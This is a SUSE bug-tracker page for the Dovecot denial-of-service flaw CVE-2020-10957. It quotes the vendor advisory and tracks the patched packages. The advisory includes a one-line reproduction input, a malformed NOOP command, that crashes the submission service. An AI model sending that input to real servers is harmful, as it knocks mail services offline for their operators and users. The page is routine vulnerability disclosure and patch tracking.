Bug 1171457 (CVE-2020-10957) - VUL-0: CVE-2020-10957: dovecot,dovecot23: Sending malformed NOOP command causes crash in submission, submission-login orlmtp service.
Summary: VUL-0: CVE-2020-10957: dovecot,dovecot23: Sending malformed NOOP command cau...
Status: RESOLVED FIXED
Alias: CVE-2020-10957
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents (show other bugs)
Version: unspecified
Hardware: Other Other
: P3 - Medium : Normal
Target Milestone: ---
Assignee: Peter Varkoly
QA Contact: Security Team bot
URL:
Whiteboard: CVSSv3.1:RedHat:CVE-2020-10957:7.5:(A...
Keywords:
Depends on:
Blocks:
 
Reported: 2020-05-11 11:37 UTC by Marcus Meissner
Modified: 2020-05-26 13:16 UTC (History)
1 user (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Comment 3 Alexandros Toptsoglou 2020-05-18 14:30:09 UTC
now public through 

https://dovecot.org/pipermail/dovecot-news/2020-May/000438.html

Internal reference: DOV-3784
Vulnerability type: NULL pointer dereference (CWE-476)
Vulnerable version: 2.3.0 - 2.3.10
Vulnerable component: submission, lmtp
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.3.10.1
Researcher credits: Philippe Antoine (Catena Cyber)
Vendor notification: 2020-03-24
Solution date: 2020-04-02
Public disclosure: 2020-05-18
CVE reference: CVE-2020-10957
CVSS: 7.5  (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Vulnerability Details:
	Sending malformed NOOP command causes crash in submission, submission-login or
	lmtp service.

Risk:
	Remote attacker can keep submission-login service down, causing denial of
	service attack. For lmtp the risk is neglible, as lmtp is usually behind a
	trusted MTA.

Steps to reproduce:
	Send ``NOOP EE"FY`` to submission port, or similarly malformed command.

Solution:
	Upgrade to fixed version.
Comment 4 OBSbugzilla Bot 2020-05-18 17:00:25 UTC
This is an autogenerated message for OBS integration:
This bug (1171457) was mentioned in
https://build.opensuse.org/request/show/807017 Factory / dovecot23
Comment 5 Swamp Workflow Management 2020-05-22 10:13:38 UTC
SUSE-SU-2020:1380-1: An update that fixes three vulnerabilities is now available.

Category: security (important)
Bug References: 1171456,1171457,1171458
CVE References: CVE-2020-10957,CVE-2020-10958,CVE-2020-10967
Sources used:
SUSE Linux Enterprise Module for Server Applications 15-SP1 (src):    dovecot23-2.3.10-11.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 6 Swamp Workflow Management 2020-05-22 10:14:47 UTC
SUSE-SU-2020:1379-1: An update that fixes three vulnerabilities is now available.

Category: security (important)
Bug References: 1171456,1171457,1171458
CVE References: CVE-2020-10957,CVE-2020-10958,CVE-2020-10967
Sources used:
SUSE Linux Enterprise Server for SAP 15 (src):    dovecot23-2.3.10-4.22.1
SUSE Linux Enterprise Server 15-LTSS (src):    dovecot23-2.3.10-4.22.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    dovecot23-2.3.10-4.22.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    dovecot23-2.3.10-4.22.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 7 Swamp Workflow Management 2020-05-26 13:14:28 UTC
openSUSE-SU-2020:0720-1: An update that fixes three vulnerabilities is now available.

Category: security (important)
Bug References: 1171456,1171457,1171458
CVE References: CVE-2020-10957,CVE-2020-10958,CVE-2020-10967
Sources used:
openSUSE Leap 15.1 (src):    dovecot23-2.3.10-lp151.2.9.1
Comment 8 Alexandros Toptsoglou 2020-05-26 13:16:27 UTC
Done